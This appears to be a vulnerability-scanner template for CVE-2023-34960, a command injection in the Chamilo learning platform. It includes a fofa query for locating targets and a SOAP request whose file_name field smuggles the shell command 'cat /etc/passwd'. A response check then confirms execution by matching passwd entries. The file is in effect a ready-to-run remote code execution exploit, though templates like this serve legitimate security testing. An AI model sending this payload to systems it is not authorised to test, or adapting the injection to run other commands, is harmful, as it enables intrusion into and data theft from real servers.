id: CVE-2023-34960

info: 
  name: Chamilo Command Injection
  author: laohuan12138
  severity: high
  verified: true
  description: |
    Chamilo是一个免费的软件在线学习平台，根据GNU / GPLv3许可，面对面，半面对面或虚拟学习的管理旨在改善全球范围内获得教育和知识的机会。
    fofa: app="Chamilo"

  reference:
    - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py
    - https://buaq.net/go-169444.html

  tags: cve,cve2023,rce
  created: 2023/06/21

set: 
  hosturl: request.url

rules:
  r0:
    request:
      method: POST
      path: /main/webservices/additional_webservices.php
      headers:
        Content-Type: text/xml; charset=utf-8
      body: |
        <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{hosturl}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>

    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) && response.headers["content-type"].contains("text/xml")

expression: r0()  